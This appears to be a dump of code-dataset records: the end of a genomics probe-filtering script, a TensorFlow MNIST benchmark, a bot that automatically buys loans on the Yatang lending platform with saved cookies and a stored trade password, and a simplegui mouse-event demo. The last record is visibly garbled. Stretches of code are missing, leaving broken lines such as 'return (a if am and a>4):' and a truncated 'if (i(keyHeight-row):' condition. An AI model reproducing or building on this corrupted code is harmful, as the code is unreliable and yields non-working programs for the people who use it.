tempdat2=probe_props.copy()\n probe_list=tempdat.iloc[:,0].map(lambda x: x.replace('Probename: ','')) #do not use strip because that does not use substring, but all combos of characters\n print('probe list from datas',probe_list)\n i=0\n for name in probe_list:\n if tempdat2['Probe name'].str.contains(name).any()==True: #only further process the probe hit data for probes in possible probes list\n print('i is',i,'probe name',name)\n print('row is',tempdat.loc[i])\n bools=tempdat.loc[i].str.match('Targetsequence: ')\n 
boolInds=bools.index[bools==True].tolist()\n print('bool inds',boolInds)\n sct=tempdat.iloc[i,boolInds]\n sct=sct.map(lambda x: x.replace('Targetsequence: ',''))\n sct.to_csv(of+'/'+name+'_'+str(mms)+'mms.csv',index=False)\n i=i+1\n else:\n i=i+1 #skip over the unmatched probe name\n\ndef probe_tmelt(dat): #calculates probe melting T according to formula Tm=64.9 + 41 x ((G + C - 16.4)/length). Annealing T for hybridization is ~5C below Tm.\n tempdat=dat.copy()\n tempdat['tmelt']=64.9+41*(((tempdat['G+C content(%)']/100*tempdat['Length (nt)'])-16.4)/tempdat['Length (nt)'])\n\ndef probe_prop_asc(probe_props): #sorts list of probe properties in descending order (Greatest No. of target hits to least no of target hits)Import csv w hdrs\n tempdat=probe_props.copy()\n tempdat.sort_values(by=['No. of target hits'], axis=0, ascending=False, inplace=True)\n tempdat.reset_index(inplace=True)\n \n return tempdat\n \ndef nested_probe_narrow(probe_props,seqDir,of='outputs',mms=0):\n tempdat0=probe_props.copy() #testProbe probe properties table\n sorteddat=probe_prop_asc(tempdat0) #sort from most to least sequence hits\n probenames=sorteddat['Probe name']\n \n for i,name in enumerate(probenames):\n indata=pd.read_csv(seqDir+'/'+name+'_'+str(mms)+'mms.csv',header=None)\n print('indata file',seqDir+'/'+name+'_'+str(mms)+'mms.csv','shape',indata.shape)\n tempdat1=indata.copy()\n \n for j in range(i+1,len(probenames)):\n indata2=pd.read_csv(seqDir+'/'+probenames[j]+'_'+str(mms)+'mms.csv',header=None)\n tempdat2=indata2.copy()\n print('nested indata file',j,seqDir+'/'+probenames[j]+'_'+str(mms)+'mms.csv','shape',indata2.shape)\n\n for seq in tempdat1[0]: #just one column, so iloc not necessary; for each sequence in file with more entries\n if tempdat2[0].str.contains(seq).any()==True: #if that sequence is anywhere in the smaller file\n bools=tempdat2[0].str.contains(seq)\n boolInds=bools.index[bools==True].tolist() #get the index of that location in the smaller file\n tempdat2.drop(tempdat2.index[boolInds],inplace=True) #drop the entry from smaller file\n tempdat2.reset_index(inplace=True)\n \n if tempdat2.shape[0]>0: #if any entries are left in the file, save it\n tempdat2.to_csv(of+'/test'+probenames[j]+'.csv',index=False,header=None)\n \ndef probe_narrower(probe_props,datDir,of='outputs',mms=0):\n tempdat0=probe_props.copy()\n sorteddat=probe_prop_asc(tempdat0) #sort from most to least sequence hits\n probenames=sorteddat['Probe name']\n \n concatFrames=[]\n \n for name in probenames: #import all the probe files as individual dataframes named 'probename_indata'\n name2=name+'_indata'\n \n name2=pd.read_csv(datDir+'/'+name+'_'+str(mms)+'mms.csv',header=None, names=['Sequence']) #explicitly set header=None to rename column through names arg\n name2.insert(loc=0,column='probe',value=name) #insert column filled with probe name at column position 0\n \n concatFrames.append(name2)\n \n merged=pd.concat(concatFrames)\n merged.reset_index(inplace=True)\n \n uniqueSeqs=merged.Sequence.unique()\n \n probeBoolDat=pd.DataFrame(columns=['Sequence']+probenames.tolist())\n \n probeBoolRowList=[]\n for uSeq in uniqueSeqs:\n probeBoolRow=pd.DataFrame(columns=['Sequence']+probenames.tolist())\n SeqProbeDat=merged.loc[merged.Sequence==uSeq]\n probeBoolRow.set_value(0,col='Sequence',value=uSeq)\n \n for name in probenames:\n probeBoolRow.set_value(0,col=name,value=SeqProbeDat['probe'].str.match(name))\n probeBoolRowList.append(probeBoolRow)\n\n \n print('dataframe list',probeBoolRowList)\n probeBoolDat = 
pd.concat(probeBoolRowList)\n print('final probe bool dat',probeBoolDat)\n \ndef blast_anot(dat,acckey,hits,of='blast_altered',ctLev='f__',metaD=True):\n dat=dat.copy()\n hits=hits.copy()\n acckey=acckey.copy()\n \n cols=['Query','Subject Accession','Percent Similarity']\n\n concatList=[]\n accs=acckey['Accession']\n\n for i, entry in enumerate(accs):\n entrydat=entry+'_dat'\n entrydat=(hits.loc[hits['Subject Accession'].str.match(entry)])[cols]\n entrydat.insert(loc=3,column='Subject Definition',value=acckey.Description.iloc[i])\n entrydat.insert(loc=4,column='Taxonomy',value=acckey.Taxonomy.iloc[i])\n concatList.append(entrydat)\n\n merged=pd.concat(concatList)\n\n merged.drop(merged[merged['Percent Similarity']<97].index,inplace=True)\n merged.reset_index(drop=True,inplace=True)\n\n for i, name in enumerate(merged['Query']):\n print('name is',name)\n print('to replace',(dat.loc[dat['OTU ID'].str.match(name)])['taxonomy'])\n print('replace with', merged.Taxonomy.iloc[i])\n \n blastTax=merged.Taxonomy.iloc[i]\n blastOrd=blastTax[blastTax.find(ctLev):blastTax.find(';',beg=blastTax.find(ctLev))]\n \n dat.replace(to_replace=(dat.loc[dat['OTU ID'].str.match(name)&dat['taxonomy']])['taxonomy'], value=merged.Taxonomy.iloc[i], inplace=True)\n\n dat.reset_index(drop=True,inplace=True)\n\n print('final data',dat)\n\n\n####actual data processing\n\n#fasta_out(indata,wnthders,wantcop=True)\n#fasta_out(indata,wnthders,nms,wantcop=True)\n\n#bact_indata=pd.read_csv('outputs/fasta_GreenLake_Bacteria_seqs.csv')\n#arch_indata=pd.read_csv('outputs/fasta_GreenLake_Archaea_seqs.csv')\n#unclass_indata=pd.read_csv('outputs/fasta_GreenLake_unassigned_seqs.csv')\n#\n#bact_tot=bact_indata['Seq Count'].sum(axis=0)\n#arch_tot=arch_indata['Seq Count'].sum(axis=0)\n#\n#bact_phyla_names,bact_phyla_counts=list_loader(bact_indata,'phylum',nm='Bacteria')\n#arch_phyla_names,arch_phyla_counts=list_loader(arch_indata,'phylum',nm='Archaea',ks='a')\n#\n#\n#unclass_tot=unclass_indata['Seq Count'].sum(axis=0)\n#\n#tax_hist(bact_phyla_counts,nm='Bacteria')\n#tax_hist(arch_phyla_counts,nm='Archaea')\n\n\n\n#test_phyla_names,test_phyla_counts=list_loader(testdat3,'phylum',nm='Bacteria')\n\n\n\n\n\n\n\n\n\n","sub_path":"genomics/csvtofasta.py","file_name":"csvtofasta.py","file_ext":"py","file_size_in_byte":20307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"244382313","text":"# -*- coding: utf-8 -*-\n\"\"\"\n| **@created on:** 08/06/18,\n| **@author:** prathyushsp,\n| **@version:** v0.0.1\n|\n| **Description:**\n| \n|\n| **Sphinx Documentation Status:** --\n|\n..todo::\n\"\"\"\n\nimport os\nimport sys\nimport json\n\nif len(sys.argv) <= 1:\n sys.argv.append('cpu')\nUSE_GPU = True if sys.argv[1] == 'gpu' else False\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\" if USE_GPU else \"\"\n\nfrom benchmark.benchmark import BenchmarkUtil\nfrom benchmark.system_monitors import CPUMonitor, MemoryMonitor, GPUMonitor\n\nbutil = BenchmarkUtil(model_name='EP11 Reinitializable_iterator_switch {}'.format(sys.argv[1]),\n stats_save_path='/tmp/stats/',\n monitors=[CPUMonitor, MemoryMonitor, GPUMonitor])\n\n\n@butil.monitor\ndef main():\n # Imports\n import tensorflow as tf\n from tensorflow.examples.tutorials.mnist import input_data\n import time\n\n # Global Variables\n EPOCH = 100\n BATCH_SIZE = 32\n DISPLAY_STEP = 1\n\n mnist = input_data.read_data_sets(\"/tmp/data/\", one_hot=True)\n\n # Create Dataset\n # Create Dataset\n train_features_dataset = 
tf.data.Dataset.from_tensor_slices(mnist.train.images)\n train_label_dataset = tf.data.Dataset.from_tensor_slices(mnist.train.labels)\n train_dataset = tf.data.Dataset.zip((train_features_dataset, train_label_dataset)).repeat(EPOCH).batch(BATCH_SIZE)\n\n # Create Valid Dataset\n valid_features_dataset = tf.data.Dataset.from_tensor_slices(mnist.test.images)\n valid_label_dataset = tf.data.Dataset.from_tensor_slices(mnist.test.labels)\n valid_dataset = tf.data.Dataset.zip((valid_features_dataset, valid_label_dataset)).batch(\n batch_size=mnist.train.num_examples)\n\n # Create Dataset Iterator\n iterator = tf.data.Iterator.from_structure(train_dataset.output_types,\n train_dataset.output_shapes)\n\n # Create features and labels\n features, labels = iterator.get_next()\n\n # Create Initialization Op\n train_init_op = iterator.make_initializer(train_dataset)\n valid_init_op = iterator.make_initializer(valid_dataset)\n\n # Deeplearning Model\n def nn_model(features, labels):\n bn = tf.layers.batch_normalization(features)\n fc1 = tf.layers.dense(bn, 50)\n fc2 = tf.layers.dense(fc1, 50)\n fc2 = tf.layers.dropout(fc2)\n fc3 = tf.layers.dense(fc2, 10)\n loss = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(labels=labels, logits=fc3))\n optimizer = tf.train.AdamOptimizer(learning_rate=0.01).minimize(loss)\n return optimizer, loss\n\n # Create elements from iterator\n training_op, loss_op = nn_model(features=features, labels=labels)\n init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n\n config_proto = tf.ConfigProto(log_device_placement=True)\n config_proto.gpu_options.allow_growth = True\n start = time.time()\n with tf.train.MonitoredTrainingSession(config=config_proto) as sess:\n sess.run(init_op)\n sess.run(train_init_op)\n batch_id, epoch_id, total_batches, avg_cost = 0, 0, int(mnist.train.num_examples / BATCH_SIZE), 0\n while True:\n try:\n _, c = sess.run([training_op, loss_op])\n avg_cost += c / total_batches\n if batch_id == total_batches:\n if epoch_id % DISPLAY_STEP == 0:\n print(\"Epoch:\", '%04d' % (epoch_id + 1), \"cost={:.9f}\".format(avg_cost))\n batch_id, avg_cost, cost = 0, 0, []\n epoch_id += 1\n batch_id += 1\n except tf.errors.OutOfRangeError:\n break\n print(\"Optimization Finished!\")\n\n sess.run(valid_init_op)\n while True:\n try:\n c = sess.run(loss_op)\n avg_cost += c / total_batches\n except tf.errors.OutOfRangeError:\n break\n print(\"Validation :\", \"cost={:.9f}\".format(avg_cost))\n\n print('Total Time Elapsed: {} secs'.format(time.time() - start))\n json.dump({'internal_time': time.time() - start}, open('/tmp/time.json', 'w'))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"EP11_ReInitializable_Iterator_Switch.py","file_name":"EP11_ReInitializable_Iterator_Switch.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"279826314","text":"#!/usr/bin/python3.6\n# -*- coding: utf-8 -*- \n\nfrom urllib.request import Request, install_opener,build_opener,HTTPCookieProcessor, HTTPRedirectHandler, URLError, HTTPError\nfrom urllib.parse import urlencode\nfrom math import floor\nfrom threading import Lock\n\nimport json, logging, os, sys, math, base64, socket, time\npythonpath = os.path.dirname(__file__)\npythonpath = os.path.abspath(os.path.join(pythonpath, os.pardir))\nif pythonpath is not None:\n paths = pythonpath.split(':' if os.name=='posix' else ';')\n for path in paths:\n if not path in sys.path:\n 
sys.path.append(path)\n\nimport yatang\nfrom modules import InvestInfo, WelfareInfo\nfrom Coupon import Coupon\nfrom Redpacket import Redpacket\nfrom Assets import Asset, Assets\nfrom utils import Encryptor\n\nlogger = logging.getLogger(\"app\")\n\nclass Invest: \n def __init__(self, name, opener, amount = None):\n self.encryptor = Encryptor()\n self.name = name #user name\n self.opener = opener\n self.amount = amount #investment amount\n self.lock = Lock()\n\n #determine the investment amount based on the red packet \n def tender(self, loan, user_info):\n logger.info(self.name + \" starts to invest in an asset loan.\")\n ammount = int(floor(loan.available_cash)) - yatang.reserved_amount\n if(ammount > loan.minAmount):\n salt = loan.uniqKey\n ppay = self.encryptor.encryptTradePassword(base64.b64decode(user_info.trade_password).decode('utf-8'), salt)\n # coupon info\n lunchid = \"0\"\n \n couponinfo = Coupon(self.opener, loan.borrowNum).couponListRequest()\n if('data' in couponinfo and len(couponinfo['data'])):\n lunchid = couponinfo['data'][0]['id']\n ammount = couponinfo['data'][0]['user_constraint']\n else:\n logger.info(\"no suitable red packet\")\n return\n # buy\n values = {\n '__hash__': loan.__hash__,\n 'ibnum': loan.borrowNum,\n 'lunchId': lunchid, # red packet ID\n 'amount': ammount,\n 'p_pay': ppay,\n 'user_id': user_info.user_id\n }\n buyinfo = self.buyRequest(values)\n if('tnum' in buyinfo):\n self.tender_info(loan.borrowNum, buyinfo['tnum'])\n import uuid\n invest = InvestInfo(id=str(uuid.uuid1()), \n name=loan.uid,\n amount = 100)\n session = yatang.Session()\n session.add(invest)\n session.commit()\n \n pass \n \n #invest using the user's available cash\n def tenderWF(self, welfare, user_info):\n if welfare == None:\n logger.warn(\"invalid welfare info\")\n return\n logger.debug(self.name +\" prepares to invest welfare: \" + str(welfare.available_cash))\n\n if(welfare.available_cash > welfare.zxtbe):\n logger.info(self.name +\" starts to invest welfare: \" + str(welfare.available_cash)+ \":\" + welfare.uniqKey)\n salt = welfare.uniqKey\n ppay = self.encryptor.encryptTradePassword(base64.b64decode(user_info.trade_password).decode('utf-8'), salt)\n # buy the instant (flash) loan\n values = {\n '__hash__': welfare.hash_value,\n 'ibnum': welfare.borrowNum,\n 'lunchId': '0', # red packet ID\n 'amount': int(math.floor(welfare.available_cash)),\n 'p_pay': ppay,\n 'user_id': user_info.user_id\n }\n for i in range(10):\n buyinfo = self.buyRequest(values)\n logger.info(\"loan purchase result: %s\" % str(buyinfo))\n if buyinfo and 'status' in buyinfo:\n if int(buyinfo['status']) == 119:\n break\n \n time.sleep(0.5)\n \n if buyinfo and 'tnum' in buyinfo:\n with self.lock:\n session = yatang.Session()\n query = session.query(WelfareInfo).filter(WelfareInfo.ibid == welfare.ibid)\n if query.count() == 0:\n welfare_info = WelfareInfo.fromWelfare(welfare)\n session.add(welfare_info)\n session.commit()\n tenderInfo = self.tender_info(welfare.borrowNum, buyinfo['tnum'])\n logger.info(\"loan purchase info: %s\" % str(tenderInfo))\n \n pass\n \n #the user decides the investment amount\n def tenderCF(self, crowdfunding, user_info, useRedPacket):\n logger.debug(self.name +\" prepares to invest in crowdfunding\" )\n lunchid = \"0\"\n redpacket = Redpacket(self.opener, crowdfunding.project_id).redpacketListRequest(self.amount)\n if(redpacket and redpacket['status'] == 1) :\n if('data' in redpacket and len(redpacket['data'])):\n found = list(filter(lambda d : d['user_constraint'] == self.amount, redpacket['data']))\n if found and len(found) > 0:\n lunchid = found[0]['id']\n if lunchid == '0':\n logger.info(\"no suitable red packet\")\n if useRedPacket:\n return\n logger.debug(\"%s starts to invest in crowdfunding %s\" % (self.name, crowdfunding))\n salt = crowdfunding.uniqKey\n ppay = 
self.encryptor.encryptTradePassword(base64.b64decode(user_info.trade_password).decode('utf-8'), salt)\n #retry\n for i in range(2):\n values = {\n '__hash__': crowdfunding.hash_value,\n 'id': crowdfunding.project_id,\n 'lunchId': lunchid, # red packet ID\n 'amount': self.amount,\n 'p_pay': ppay,\n 'vcode': ''\n }\n data = urlencode(values)\n headers = {\n 'User-Agent': yatang.YT_USER_AGENT,\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'\n }\n req = Request(yatang.YTURLBASESSL + '/Crowdfunding/checkPay', data.encode(encoding='UTF8'), headers)\n jsonresp = {}\n try:\n response = self.opener.open(req, timeout=30)\n if response.code == 200 :\n resp_data =response.read().decode(encoding='UTF8')\n jsonresp = json.loads(resp_data)\n logger.info('%s crowdfunding purchase result: %s' % (self.name, jsonresp))\n if jsonresp and 'status' in jsonresp:\n if int(jsonresp['status']) == 119:\n break\n except URLError as e:\n logger.warn(e)\n except HTTPError as h:\n logger.warn(h)\n except socket.timeout as t:\n logger.warn(t)\n except ValueError: \n logger.warn(\"invalid json format\")\n logger.warn(resp_data)\n except:\n print (\"Unexpected error:\", sys.exc_info()[0])\n logging.getLogger(\"app\").warn('Unexpected error:', sys.exc_info()[0])\n \n logger.info(\"loan purchase result: \" + str(jsonresp))\n time.sleep(0.5)\n pass\n \n def buyRequest(self, values):\n logging.info('start purchasing loan: ' + str(values['amount']))\n data = urlencode(values)\n headers = {\n 'User-Agent': yatang.YT_USER_AGENT,\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'\n }\n req = Request(yatang.YTURLBASESSL + '/Invest/checkppay', data.encode(encoding='UTF8'), headers)\n jsonresp = {}\n try:\n response = self.opener.open(req, timeout=30)\n if response.code == 200 :\n resp_data =response.read().decode()\n jsonresp = json.loads(resp_data)\n except URLError as e:\n logger.warn(e)\n except HTTPError as h:\n logger.warn(h)\n except socket.timeout as t:\n logger.warn(t)\n except ValueError: \n logger.warn(\"invalid json format\")\n logger.warn(resp_data)\n except:\n print (\"Unexpected error:\", sys.exc_info()[0])\n logging.getLogger(\"app\").warn('Unexpected error:', sys.exc_info()[0])\n \n return jsonresp\n\n def tender_info(self, borrow_num, tnum):\n values = {\n 'borrow_num':borrow_num,\n 'tnum': tnum\n }\n data = urlencode(values)\n headers = {\n 'User-Agent': yatang.YT_USER_AGENT,\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'\n }\n req = Request(yatang.YTURLBASESSL + 'Public/tenderinfo', data.encode(encoding='UTF8'), headers)\n jsonresp = {}\n try:\n response = self.opener.open(req, timeout=30)\n if response.code == 200 :\n resp_data =response.read().decode()\n jsonresp = json.loads(resp_data)\n except URLError as e:\n logger.warn(e)\n except HTTPError as h:\n logger.warn(h)\n except socket.timeout as t:\n logger.warn(t)\n except ValueError:\n logger.warn(\"invalid json format\")\n logger.warn(resp_data)\n except:\n print (\"Unexpected error:\", sys.exc_info()[0])\n logging.getLogger(\"app\").warn('Unexpected error:', sys.exc_info()[0])\n \n return jsonresp\n \n def investListRequest(self, typeList=[5]):\n values = {\n 'mode':1,\n 'tpage[page]':1,\n 'tpage[size]':20\n }\n data = urlencode(values)\n headers = {\n 'User-Agent': yatang.YT_USER_AGENT,\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'\n }\n req = Request(yatang.YTURLBASESSL + 'index.php?s=/Invest/GetBorrowlist', data.encode(encoding='UTF8'), headers)\n aList = []\n try:\n response = self.opener.open(req, timeout=30)\n if response.code == 200:\n resp_data = 
response.read().decode()\n jsonresp = json.loads(resp_data)\n\n if(len(typeList) and jsonresp):\n for loan in jsonresp['data']['Rows']:\n bt = int(loan['borrow_type'])\n if bt in typeList:\n if bt in [1, 9] and int(loan[\"time_limit\"]) == 3:\n aList.append(loan)\n else:\n aList.append(loan)\n else:\n if jsonresp:\n aList = jsonresp['data']['Rows']\n except URLError as e:\n logger.warn(e)\n except HTTPError as h:\n logger.warn(h)\n except socket.timeout as t:\n logger.warn(t)\n except ValueError:\n logger.warn(\"data was not valid JSON\")\n logger.warn(resp_data)\n except:\n print (\"Unexpected error:\", sys.exc_info()[0])\n logging.getLogger(\"app\").warn('Unexpected error:', sys.exc_info()[0])\n \n return aList\n\nif __name__ == '__main__':\n\n from Cookies import Cookies\n from Account import Account\n from Loan import Loan\n c = Cookies()\n cj = c.readCookie('emmaye')\n #c.dumpCookies(cj)\n opener = build_opener(HTTPCookieProcessor(cj), HTTPRedirectHandler())\n install_opener(opener)\n\n acc = Account(opener)\n accountinfo = acc.accountRequest()\n totalAmount = accountinfo.available\n\n #i = Invest('emmaye', opener)\n #i.investListRequest()\n\n assets = Assets(opener)\n assetList = []\n idx = 1\n while len(assetList) < 10:\n assetList.extend(assets.assetRequest(str(idx)))\n idx += idx\n\n print(assetList)\n\n for asset in assetList:\n print(asset)\n loan = Loan.loanRequest(opener, asset)\n coupon = Coupon(opener, loan.borrowNum)\n print(coupon.couponListRequest())\n pass","sub_path":"python3/yatang/Invest.py","file_name":"Invest.py","file_ext":"py","file_size_in_byte":12298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"148169080","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# mouseEventExample.py\n\n#\n# Copyright 2014 William Sebastian Martinez Bas \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n#\n\n\n# To hide debug info (key pressed and mouse event), touch NODBG\n# For no cursor, touch NOCURS\n# To hide Control Area, touch NOCTRL (only if you do not use control area labels and buttons)\n\nimport time;\nfrom math import *;\n\n\ntry:\n\timport simpleguitk as simplegui;\n\tEscape='escape';\n\tcompenso=.9;\nexcept:\n\timport simplegui;\n\tEscape=27;\n\tcompenso=1;\n\n\n\n\n\nfalse=False;\ntrue=True;\ncursor=false;\nevento=false;\nlgr=1;\n#pseudoconstants and not-dependent variables\npulsos=5;\n\noutMessage=\"Come back soon!!! 
Bye!!!\";\nWIDTH=800;\nHEIGHT=400;\nSpace=32;\nEnter=13;\nBackspace=8;\nconv=pi/180\ncharSize=17;\nfontSize=charSize;\nxi=0;yi=1;\nxf=2;yf=3;\nx=0;y=1;\n\ngoIn=\"getMouseFocus\";goOver=\"mouseOver\";goOut=\"lostMouseFocus\";\nEventos=[goIn, goOver, goOut];\nExit=\"Exit\";Off=Exit;\nAddField=\"Add Field\";\nAddLabel=\"Add Label\";\nAddButton=\"Add Button\";\n#Arrays\nButtons=[Exit,False,\n\t\t AddField,False,\n\t\t AddLabel,False,\n\t\t AddButton,False,\n\t\t False,False];\n\n#program variables\ntop=10;\nlft=10;\nrow=5;\nlines=5;\nbuttonsPerLine=2;\nrecentClick=0;\nselected='_';\n\n\ndef isset(variable):\n\ttry:\n\t\treturn (variable in locals() or variable in globals());\n\texcept:\n\t\treturn(false);\n\n#generalIsimas purpose functions\ndef major(a,b): return (a if a>b else b);\ndef minor(a,b): return (a if am and a>4):\n\t\t\ta-=1;\n\t\t#(y1-y0)/3\n\telse:\n\t\ta=charSize;\n\n\ttext=txt;\n\tdx=abs(x1-x0-a/2);\n\twhile (frame.get_canvas_textwidth(text, a*compenso)>dx):\n\t\ttext=text[:-1];\n\n\tcentrox=(x1+x0-e)/2; centroy=(y1+y0)/2;\n\tcentra=abs(centrox-frame.get_canvas_textwidth(text, a*compenso)/2);\n\tcanvas.draw_text(text, [centra+e/2,centroy+e], a*compenso, front);\n\ndef screener(canvas,l=0,t=0,w=100,h=50,txt=\"test\"):\n\tbutton(canvas,l,t,w,h,txt,'#e34','FloralWhite', 6);\ndef screenerDisabled(canvas,l=0,t=0,w=100,h=50,txt=\"test\"):\n\tbutton(canvas,l,t,w,h,txt,'#AAA','#ccc',5,\"#ccc\");\ndef buttonNotPressed(canvas,l=0,t=0,w=100,h=50,txt=\"test\",charSize=-1):\n\tbutton(canvas,l,t,w,h,txt,'#EFF','#AAA',5,\"#ccc\",charSize);\ndef buttonPressed(canvas,l=0,t=0,w=100,h=50,txt=\"test\",charSize=-1):\n\tbutton(canvas,l,t,w,h,txt,\"#AAA\",'#222',5,\"#333\",charSize);\ndef buttonSelected(canvas,l=0,t=0,w=100,h=50,txt=\"test\",charSize=-1):\n\tglobal lgr;\n\te=5;\n\tbutton(canvas,l,t,w,h,txt,'#EFF','#AAA',e);\n\tu=lgr; lgr=5; rectangle(canvas,l,t,l+w,t+h,'#E00','None');lgr=u;\n\n\n#this app functions\n\ndef draw_handler(canvas):\n\tglobal charSize,recentClick,selected,flu,cursor,evento;\n\n\t#an.draw_circle((CX, CY), 145, 5, \"#A9A9A9\", \"#A9A9A9\");\n\t#an.draw_circle((CX, CY), 180, 5, \"Black\",'#FAFAD2');\n\tcl=10;#crux large\n\tcc=4;#crux center\n\t#canvas.draw_line((10, 20), (30, 40), 12, 'Red');\n\tcanvas.draw_oval([(1, 20),(50, 40)], 2, 'Red', fill_color=None);\n\n\ttry:\n\t\tflu;\n\texcept:\n\t\tflu=0;\n\n\t#Buttons\n\ti=0;\n\tflet=0;\n\tnobut=false;\n\tfor f in range(0,lines):\n\t\tfor g in range(0,buttonsPerLine):\n\t\t\tif (Buttons[i]!=False and\n\t\t\t\tButtons[i]!=True and\n\t\t\t\ttype(pB[i])==type([1,2,3,4,5])\n\t\t\t\t):\n\t\t\t\tif (selected==Buttons[i] and\n\t\t\t\t\t recentClick>0):\n\t\t\t\t\t\tbuttonPressed(canvas,\n\t\t\t\t\t\t\t\t\t pB[i][xi],\n\t\t\t\t\t\t\t\t\t pB[i][yi],\n\t\t\t\t\t\t\t\t\t pB[i][xf],\n\t\t\t\t\t\t\t\t\t pB[i][yf],\n\t\t\t\t\t\t\t\t\t Buttons[i],\n\t\t\t\t\t\t\t\t\t charSize*.66);\n\t\t\t\t\t\tif Buttons[i]==Off:\n\t\t\t\t\t\t\tif recentClick<=1:\n\t\t\t\t\t\t\t\texit(outMessage);\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tflet=1;\n\t\t\t\telse:\n\t\t\t\t\t\tbuttonNotPressed(canvas,\n\t\t\t\t\t\t\t\t\t\t pB[i][xi],\n\t\t\t\t\t\t\t\t\t\t pB[i][yi],\n\t\t\t\t\t\t\t\t\t\t pB[i][xf],\n\t\t\t\t\t\t\t\t\t\t pB[i][yf],\n\t\t\t\t\t\t\t\t\t\t Buttons[i],\n\t\t\t\t\t\t\t\t\t\t charSize);\n\n\t\t\ti+=1;\n\t\t\tif flet==1:\n\t\t\t\tcanvas.draw_text(outMessage,[(CX-frame.get_canvas_textwidth(outMessage,charSize)),CY],40, \"#f00\", \"monospace\");\n\t\t\t\tif (flu==0):\n\t\t\t\t\tflu=seconds;\n\t\t\t\telif 
(seconds>flu+2):\n\t\t\t\t\texit(outMessage);\n\n\t#highlight box over the hovered button\n\tlast=i;\n\ti=0;\n\tfor f in range(0,lines):\n\t\tfor g in range(0,buttonsPerLine):\n\t\t\tif (Buttons[i]!=False and\n\t\t\t\tButtons[i]!=True and\n\t\t\t\ttype(pB[i])==type([1,2,3,4,5])\n\t\t\t\t):\n\t\t\t\tp=pB[i];i+=1;\n\n\t\t\t\tif ( len(p)>=5 and cursor and\n\t\t\t\tcursor[x]>=p[xi] and\n\t\t\t\tcursor[x]<=p[xf] and\n\t\t\t\tcursor[y]>=p[yi] and\n\t\t\t\tcursor[y]<=p[yf]):\n\t\t\t\t\trectangle(\n\t\t\t\t\t\tcanvas,\n\t\t\t\t\t\t(p[xi], p[yi]),\n\t\t\t\t\t\t(p[xf], p[yf]),\n\t\t\t\t\t\t'#538457');\n\n\n\tif recentClick<=1:\n\t\tselected=' ';\n\n\n\t#Cursor\n\tif (cursor):\n\t\tif (evento==goOver):\n\t\t\tcircle(canvas,(cursor[x],cursor[y]), 20, \"#538457\");\n\t\t\tline(canvas,(cursor[x]-cl-cc,cursor[y]),(cursor[x]-cc,cursor[y]), \"#538457\");\n\t\t\tline(canvas,(cursor[x]+cc,cursor[y]),(cursor[x]+cl+cc,cursor[y]), \"#538457\");\n\t\t\tline(canvas,(cursor[x],cursor[y]-cl-cc),(cursor[x],cursor[y]-cc), \"#538457\");\n\t\t\tline(canvas,(cursor[x],cursor[y]+cc),(cursor[x],cursor[y]+cl+cc), \"#538457\");\n\t\telif (evento==goOut):\n\t\t\tline(canvas,(cursor[x]-cl-cc,cursor[y]-cl-cc),(cursor[x]-cc,cursor[y]-cc), \"#754835\");\n\t\t\tline(canvas,(cursor[x]+cc,cursor[y]+cc),(cursor[x]+cl+cc,cursor[y]+cl+cc), \"#754835\");\n\t\t\tline(canvas,(cursor[x]+cl+cc,cursor[y]-cl-cc),(cursor[x]+cc,cursor[y]-cc), \"#754835\");\n\t\t\tline(canvas,(cursor[x]-cc,cursor[y]+cc),(cursor[x]-cl-cc,cursor[y]+cl+cc), \"#754835\");\n\n\n\n\ndef tecla(key):\n\tglobal selected,recentClick;\n\tif(key==Escape):\n\t\tselected=Exit;\n\t\trecentClick=pulsos;\n\ndef raton(position):\n\tglobal selected,recentClick;\n\tpx=position[0];\n\tpy=position[1];\n\ti=0;\n\tfor f in range(0,lines):\n\t\tfor g in range(0,buttonsPerLine):\n\t\t\tif (i(keyHeight-row):\n\t\t\t\t\tcara-=16;\n\t\t\t\t\tpB[i]=[\n\t\t\t\t\tlft+g*(keyWidth+row),\n\t\t\t\t\tHEIGHT-keyHeight-top-(f*(keyHeight+row))-ajusty,\n\t\t\t\t\tkeyWidth+ajustx,\n\t\t\t\t\tkeyHeight+ajusty,\n\t\t\t\t\tcara\n\t\t\t\t\t];\n\t\ti+=1;\n\n\n\ndef timex():\n\tglobal seconds;\n\ttry: seconds+=1;\n\texcept: seconds=0;\n\ndef ratonapretado(position):\n\tglobal selected,recentClick;\n\tprint(position);\n\n\nframe = simplegui.create_frame('Start', WIDTH, HEIGHT);\nframe.set_canvas_background(\"FloralWhite\");\nframe.set_mouseclick_handler(raton);\n\nframe.set_keydown_handler(tecla);\nframe.set_draw_handler(draw_handler);\ncan=frame._canvas._get_widget();\n\n\ndef enterB(event):\n\tglobal cursor,evento;\n\tcursor=(event.x, event.y);\n\tevento=goIn;\n\n\ndef leaveB(event):\n\tglobal cursor,evento;\n\tcursor=(event.x, event.y);\n\tevento=goOut;\n\ndef overB(event):\n\tglobal cursor,evento;\n\tcursor=(event.x, event.y);\n\tevento=goOver;\n\n\n\n'''\n{ 2: \"KeyPress\",\n  3: \"KeyRelease\",\n  4: \"ButtonPress\",\n  5: \"ButtonRelease\",\n  6: \"Motion\",\n  7: \"Enter\",\n  8: \"Leave\",\n  